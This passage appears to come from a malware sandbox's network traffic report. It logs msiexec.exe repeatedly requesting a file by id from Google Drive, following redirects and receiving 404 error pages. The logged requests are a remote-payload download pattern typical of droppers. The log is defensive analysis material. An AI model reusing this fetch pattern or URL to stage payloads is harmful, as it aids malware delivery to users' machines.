                                                                                          2025-01-10 14:17:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 75 53 31 4a 4e 32 45 72 37 38 53 54 36 50 36 54 6f 30 50 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-uS1JN2Er78ST6P6To0PHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.650007142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:26 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:27 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:27 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZY_8WUVeNh0_7iT1h5-kOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.650008216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:28 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:28 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTPHlsYCxQBD3XByofZQWkU5v1TPsazJ89RGxp252ILNsba_MXvZblxohrhj1l3Koxh
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:28 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-0to7DuxX24XE9i3F2cPFMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 58 69 52 41 64 49 72 56 32 51 7a 6a 4f 38 6d 46 36 46 47 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8XiRAdIrV2QzjO8mF6FGYg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.650009142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:29 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:29 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:29 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-YIX9psvreekzAcwhrDtEwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.650010216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:30 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:30 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTCXI2RpCHyS7wW4CS3AQvmV2M-wFk1LE_rCJqmrG31kI_KotDqxZzNnlFv87il8FKV7IwmxeM
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:30 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-4c5VbNs3s2yayQ42twrFaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 65 79 69 59 5a 48 4c 45 6f 6a 66 67 73 72 59 35 4a 61 6c 5f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GeyiYZHLEojfgsrY5Jal_Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.650012142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:31 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:32 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:31 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-5Rm0un58Fn2oBa5NgQsQAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.650013216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:32 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:33 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTDd2LXSrTX-FsSt6rvNAsoI1OmBad156y6ASntf6p5_kjNxsz_uEONOyxruF1Do7WQ
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:33 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-cpcDJH9Oq3Uh8pgUAN6yJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:33 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 7a 6b 63 74 38 79 5a 6f 68 64 6d 4b 38 51 46 58 34 42 37 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_zkct8yZohdmK8QFX4B74g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.650015142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:34 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:34 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:34 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-d0Uux2l-Iw6EMU928_Lgsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.650016216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:35 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
